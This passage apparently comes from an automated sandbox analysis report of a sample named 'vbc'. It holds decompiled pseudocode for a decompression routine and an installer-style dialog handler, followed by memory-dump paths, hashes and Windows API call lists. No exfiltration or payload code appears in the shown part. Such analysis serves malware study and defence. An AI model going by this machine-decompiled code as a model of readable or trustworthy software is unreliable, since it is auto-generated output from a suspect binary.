                                                								L31:
                                                								_v20 = _t283 + 1;
                                                								do {
                                                									_v16 = _v16 + 1;
                                                									_t296 = _v28 - _v24;
                                                									if(_t296 > _a28) {
                                                										_t296 = _a28;
                                                									}
                                                									_t222 = _v8 - _v24;
                                                									_t254 = 1 << _t222;
                                                									if(1 <= _v20) {
                                                										L40:
                                                										_t256 =  *_a36;
                                                										_t168 = 1 << _t222;
                                                										_v40 = 1;
                                                										_t274 = _t256 + 1;
                                                										if(_t274 > 0x5a0) {
                                                											goto L64;
                                                										}
                                                									} else {
                                                										_t275 = _v32;
                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                										if(_t222 >= _t296) {
                                                											goto L40;
                                                										}
                                                										while(1) {
                                                											_t222 = _t222 + 1;
                                                											if(_t222 >= _t296) {
                                                												goto L40;
                                                											}
                                                											_t275 = _t275 + 4;
                                                											_t264 = _t263 + _t263;
                                                											_t175 =  *_t275;
                                                											if(_t264 <= _t175) {
                                                												goto L40;
                                                											}
                                                											_t263 = _t264 - _t175;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t168 = _a32 + _t256 * 4;
                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                									 *_a36 = _t274;
                                                									_t259 = _v16;
                                                									 *_t297 = _t168;
                                                									if(_t259 == 0) {
                                                										 *_a24 = _t168;
                                                									} else {
                                                										_t276 = _v12;
                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                										_a5 = _a28;
                                                										_a4 = _t222;
                                                										_t262 = _t276 >> _t186;
                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                										 *(_t298 + _t262 * 4) = _a4;
                                                									}
                                                									_t224 = _v24;
                                                									_t186 = _t224;
                                                									_t225 = _t224 + _a28;
                                                									_v24 = _t225;
                                                								} while (_v8 > _t225);
                                                								L45:
                                                								_t284 = _v36;
                                                								_a5 = _v8 - _t186;
                                                								if(_t284 < 0x432190 + _a8 * 4) {
                                                									_t205 =  *_t284;
                                                									if(_t205 >= _a12) {
                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                										_v36 =  &(_v36[1]);
                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                									} else {
                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                										_t208 =  *_t284;
                                                										_v36 =  &(_t284[1]);
                                                									}
                                                									_a6 = _t208;
                                                								} else {
                                                									_a4 = 0xc0;
                                                								}
                                                								_t286 = 1 << _v8 - _t186;
                                                								_t244 = _v12 >> _t186;
                                                								while(_t244 < _v40) {
                                                									 *(_t168 + _t244 * 4) = _a4;
                                                									_t244 = _t244 + _t286;
                                                								}
                                                								_t287 = _v12;
                                                								_t246 = 1 << _v44;
                                                								while((_t287 & _t246) != 0) {
                                                									_t287 = _t287 ^ _t246;
                                                									_t246 = _t246 >> 1;
                                                								}
                                                								_t288 = _t287 ^ _t246;
                                                								_v20 = 1;
                                                								_v12 = _t288;
                                                								_t251 = _v16;
                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                									L60:
                                                									if(_v48 != 0) {
                                                										_t282 = _v48;
                                                										_t283 = _t282 - 1;
                                                										_t200 = _a28 + _t186;
                                                										_v48 = _t283;
                                                										_v24 = _t200;
                                                										if(_v8 <= _t200) {
                                                											goto L45;
                                                										}
                                                										goto L31;
                                                									}
                                                									break;
                                                								} else {
                                                									goto L58;
                                                								}
                                                								do {
                                                									L58:
                                                									_t186 = _t186 - _a28;
                                                									_t251 = _t251 - 1;
                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                								_v16 = _t251;
                                                								goto L60;
                                                							}
                                                							L61:
                                                							_v8 = _v8 + 1;
                                                							_v32 = _v32 + 4;
                                                							_v44 = _v44 + 1;
                                                						} while (_v8 <= _v28);
                                                						goto L62;
                                                					}
                                                					_t277 = 0;
                                                					do {
                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                						_t277 = _t277 + 4;
                                                						_t235 = _t235 - 1;
                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                					} while (_t235 != 0);
                                                					goto L21;
                                                				}
                                                				 *_a24 =  *_a24 & 0x00000000;
                                                				 *_a28 =  *_a28 & 0x00000000;
                                                				return 0;
                                                			}











































































                                                0x00407567
                                                0x0040756f
                                                0x00407573
                                                0x00407575
                                                0x00407578
                                                0x0040757a
                                                0x0040757a
                                                0x0040757c
                                                0x00407583
                                                0x00407585
                                                0x00407585
                                                0x0040758b
                                                0x004075a0
                                                0x004075a8
                                                0x004075aa
                                                0x004075ac
                                                0x004075af
                                                0x004075b0
                                                0x004075b0
                                                0x004075b6
                                                0x00000000
                                                0x00000000
                                                0x004075b8
                                                0x004075bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075bb
                                                0x004075bf
                                                0x004075c2
                                                0x004075c4
                                                0x004075c4
                                                0x004075c7
                                                0x004075cd
                                                0x004075ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075ce
                                                0x004075d3
                                                0x004075d6
                                                0x004075d8
                                                0x004075d8
                                                0x004075de
                                                0x004075e0
                                                0x004075f1
                                                0x004075e4
                                                0x004075e8
                                                0x0040788d
                                                0x00000000
                                                0x0040788d
                                                0x004075ee
                                                0x004075ef
                                                0x004075ef
                                                0x004075f7
                                                0x004075fa
                                                0x004075fe
                                                0x00407600
                                                0x00407602
                                                0x00407605
                                                0x00000000
                                                0x00000000
                                                0x0040760d
                                                0x00407613
                                                0x00407615
                                                0x00407617
                                                0x00407618
                                                0x0040762d
                                                0x0040762d
                                                0x00407630
                                                0x00407632
                                                0x00407632
                                                0x00407634
                                                0x00407639
                                                0x0040763b
                                                0x00407642
                                                0x00407644
                                                0x0040764c
                                                0x0040764c
                                                0x0040764e
                                                0x0040764f
                                                0x0040765e
                                                0x00407662
                                                0x00407666
                                                0x00407669
                                                0x0040766c
                                                0x00407671
                                                0x00407674
                                                0x0040767a
                                                0x00407681
                                                0x00407687
                                                0x00407880
                                                0x00407880
                                                0x00407885
                                                0x00407894
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407885
                                                0x00407694
                                                0x00407697
                                                0x0040769a
                                                0x0040769d
                                                0x004076a1
                                                0x00000000
                                                0x00000000
                                                0x004076ac
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x004076c1
                                                0x004076c2
                                                0x004076c5
                                                0x004076c8
                                                0x004076cb
                                                0x004076d1
                                                0x004076d3
                                                0x004076d3
                                                0x004076db
                                                0x004076df
                                                0x004076e4
                                                0x00407709
                                                0x0040770f
                                                0x00407711
                                                0x00407713
                                                0x00407716
                                                0x0040771f
                                                0x00000000
                                                0x00000000
                                                0x004076e6
                                                0x004076e6
                                                0x004076ef
                                                0x004076f3
                                                0x00000000
                                                0x00000000
                                                0x00407704
                                                0x00407704
                                                0x00407707
                                                0x00000000
                                                0x00000000
                                                0x004076f7
                                                0x004076fa
                                                0x004076fc
                                                0x00407700
                                                0x00000000
                                                0x00000000
                                                0x00407702
                                                0x00407702
                                                0x00000000
                                                0x00407704
                                                0x00407728
                                                0x0040772e
                                                0x00407738
                                                0x0040773a
                                                0x0040773f
                                                0x00407741
                                                0x00407777
                                                0x00407743
                                                0x00407743
                                                0x00407746
                                                0x00407749
                                                0x00407753
                                                0x00407756
                                                0x0040775d
                                                0x00407768
                                                0x0040776f
                                                0x0040776f
                                                0x00407779
                                                0x0040777c
                                                0x0040777e
                                                0x00407784
                                                0x00407784
                                                0x0040778d
                                                0x00407790
                                                0x00407795
                                                0x004077a4
                                                0x004077ac
                                                0x004077b1
                                                0x004077d5
                                                0x004077dd
                                                0x004077e1
                                                0x004077e7
                                                0x004077b3
                                                0x004077c1
                                                0x004077c4
                                                0x004077ca
                                                0x004077ca
                                                0x004077eb
                                                0x004077a6
                                                0x004077a6
                                                0x004077a6
                                                0x004077fc
                                                0x00407800
                                                0x0040780c
                                                0x00407807
                                                0x0040780a
                                                0x0040780a
                                                0x00407814
                                                0x00407819
                                                0x00407821
                                                0x0040781d
                                                0x0040781f
                                                0x0040781f
                                                0x00407827
                                                0x00407829
                                                0x00407830
                                                0x0040783a
                                                0x00407844
                                                0x00407860
                                                0x00407864
                                                0x004076a9
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407846
                                                0x00407846
                                                0x00407846
                                                0x0040784b
                                                0x00407854
                                                0x0040785d
                                                0x00000000
                                                0x0040785d
                                                0x0040786a
                                                0x0040786a
                                                0x0040786d
                                                0x00407874
                                                0x00407877
                                                0x00000000
                                                0x0040769a
                                                0x0040761a
                                                0x0040761c
                                                0x0040761c
                                                0x00407620
                                                0x00407623
                                                0x00407624
                                                0x00407624
                                                0x00000000
                                                0x0040761c
                                                0x00407590
                                                0x00407596
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x434f28;
                                                				_v28 =  *0x434f10 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x434f19 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x42d24c;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x42d260;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x42d24c = 0;
                                                								 *0x42d260 = 0;
                                                								 *0x434f60 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404ED4();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x42d260;
                                                									_t201 =  *0x434f28;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x434f2c <= 0) {
                                                										L86:
                                                										if( *0x434fbe == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x434f2c);
                                                									goto L86;
                                                								} else {
                                                									_t293 = E004012E2( *0x42d260);
                                                									E00401299(_t293);
                                                									_t222 = 0;
                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x434f60 = _t291;
                                                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x42d24c = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404499(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404499(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x434f2c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x42d260 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x42d260 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x434f2c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E004044CE(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E004044CE(_v12);
                                                								L93:
                                                								return E00404500(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404f0d
                                                0x00404f26
                                                0x00404f2b
                                                0x00404f33
                                                0x00404f39
                                                0x00404f4f
                                                0x00404f52
                                                0x0040517d
                                                0x00405184
                                                0x00405198
                                                0x00405186
                                                0x00405188
                                                0x0040518b
                                                0x0040518c
                                                0x00405193
                                                0x00405193
                                                0x004051a4
                                                0x004051b2
                                                0x004051b5
                                                0x004051cb
                                                0x00405240
                                                0x00405243
                                                0x00405245
                                                0x0040524f
                                                0x0040525d
                                                0x0040525d
                                                0x0040525f
                                                0x00405269
                                                0x0040526f
                                                0x00405272
                                                0x00405275
                                                0x00405290
                                                0x00405277
                                                0x00405281
                                                0x00405281
                                                0x00405275
                                                0x00405269
                                                0x00000000
                                                0x00405243
                                                0x004051d0
                                                0x004051db
                                                0x004051e0
                                                0x004051e7
                                                0x004051ec
                                                0x004051f0
                                                0x004051fb
                                                0x004051fb
                                                0x004051ff
                                                0x00405203
                                                0x00405207
                                                0x0040521a
                                                0x00405209
                                                0x00405209
                                                0x00405210
                                                0x00405216
                                                0x00405212
                                                0x00405212
                                                0x00405212
                                                0x00405210
                                                0x0040521e
                                                0x00405220
                                                0x00405233
                                                0x00405236
                                                0x00405239
                                                0x00405239
                                                0x00405203
                                                0x00000000
                                                0x004051f0
                                                0x004051d2
                                                0x004051d9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405293
                                                0x00405293
                                                0x0040529a
                                                0x0040530b
                                                0x00405313
                                                0x0040531b
                                                0x0040531b
                                                0x00405324
                                                0x00405326
                                                0x0040532d
                                                0x00405330
                                                0x00405330
                                                0x00405336
                                                0x0040533d
                                                0x00405340
                                                0x00405340
                                                0x00405346
                                                0x0040534c
                                                0x00405352
                                                0x00405352
                                                0x0040535f
                                                0x004054c0
                                                0x004054c7
                                                0x004054e4
                                                0x004054ea
                                                0x004054fc
                                                0x004054fc
                                                0x00000000
                                                0x00405365
                                                0x00405367
                                                0x0040536c
                                                0x00405371
                                                0x00405376
                                                0x00405378
                                                0x00405378
                                                0x00405379
                                                0x0040537a
                                                0x0040537c
                                                0x0040537c
                                                0x00405384
                                                0x004053c5
                                                0x004053c7
                                                0x004053d7
                                                0x004053da
                                                0x004053df
                                                0x004053e6
                                                0x004053e9
                                                0x0040548b
                                                0x00405494
                                                0x0040549c
                                                0x0040549c
                                                0x004054aa
                                                0x004054bb
                                                0x004054bb
                                                0x00000000
                                                0x004054aa
                                                0x004053ef
                                                0x004053f2
                                                0x004053f8
                                                0x004053fd
                                                0x004053ff
                                                0x00405401
                                                0x00405407
                                                0x0040540e
                                                0x00405413
                                                0x0040541a
                                                0x0040541d
                                                0x0040541d
                                                0x00405424
                                                0x00405430
                                                0x00405434
                                                0x00405436
                                                0x00405436
                                                0x00405426
                                                0x00405428
                                                0x00405428
                                                0x00405456
                                                0x00405462
                                                0x00405471
                                                0x00405471
                                                0x00405473
                                                0x00405476
                                                0x0040547f
                                                0x00000000
                                                0x00405386
                                                0x00405391
                                                0x00405394
                                                0x00405399
                                                0x0040539b
                                                0x0040539f
                                                0x004053af
                                                0x004053b9
                                                0x004053bb
                                                0x004053be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053a1
                                                0x004053a1
                                                0x004053a7
                                                0x004053a9
                                                0x004053a9
                                                0x004053aa
                                                0x004053ab
                                                0x00000000
                                                0x004053a1
                                                0x00405384
                                                0x0040535f
                                                0x004052a2
                                                0x00000000
                                                0x004052b8
                                                0x004052c2
                                                0x004052c7
                                                0x00000000
                                                0x00000000
                                                0x004052d9
                                                0x004052de
                                                0x004052ea
                                                0x004052ea
                                                0x004052ec
                                                0x004052fb
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00000000
                                                0x00405304
                                                0x004052a2
                                                0x00404f58
                                                0x00404f5d
                                                0x00404f66
                                                0x00404f6d
                                                0x00404f7f
                                                0x00404f8a
                                                0x00404f90
                                                0x00404f9e
                                                0x00404fb2
                                                0x00404fb7
                                                0x00404fc4
                                                0x00404fc9
                                                0x00404fdf
                                                0x00404ff0
                                                0x00404ffd
                                                0x00404ffd
                                                0x00405000
                                                0x00405006
                                                0x00405008
                                                0x0040500b
                                                0x00405010
                                                0x00405015
                                                0x00405017
                                                0x00405017
                                                0x00405037
                                                0x00405037
                                                0x00405039
                                                0x0040503a
                                                0x0040503f
                                                0x00405045
                                                0x00405049
                                                0x0040504e
                                                0x00405056
                                                0x0040505a
                                                0x0040505f
                                                0x00405064
                                                0x0040506c
                                                0x0040506f
                                                0x0040513f
                                                0x00405152
                                                0x00000000
                                                0x00405075
                                                0x00405078
                                                0x0040507b
                                                0x0040507e
                                                0x0040507e
                                                0x00405084
                                                0x0040508d
                                                0x00405090
                                                0x00405094
                                                0x00405097
                                                0x0040509a
                                                0x004050a3
                                                0x004050ac
                                                0x004050af
                                                0x004050b2
                                                0x004050b5
                                                0x004050f3
                                                0x0040511e
                                                0x004050f5
                                                0x00405104
                                                0x00405104
                                                0x004050b7
                                                0x004050ba
                                                0x004050c8
                                                0x004050d2
                                                0x004050da
                                                0x004050e1
                                                0x004050ec
                                                0x004050ec
                                                0x004050b5
                                                0x00405124
                                                0x00405125
                                                0x00405131
                                                0x00405131
                                                0x0040513d
                                                0x00405158
                                                0x0040515b
                                                0x00405178
                                                0x00000000
                                                0x0040515d
                                                0x00405162
                                                0x0040516b
                                                0x004054fe
                                                0x00405510
                                                0x00405510
                                                0x0040515b
                                                0x00000000
                                                0x0040513d
                                                0x0040506f

                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                • LoadImageW.USER32 ref: 00404F8A
                                                • SetWindowLongW.USER32 ref: 00404FA3
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                • SetWindowLongW.USER32 ref: 00405152
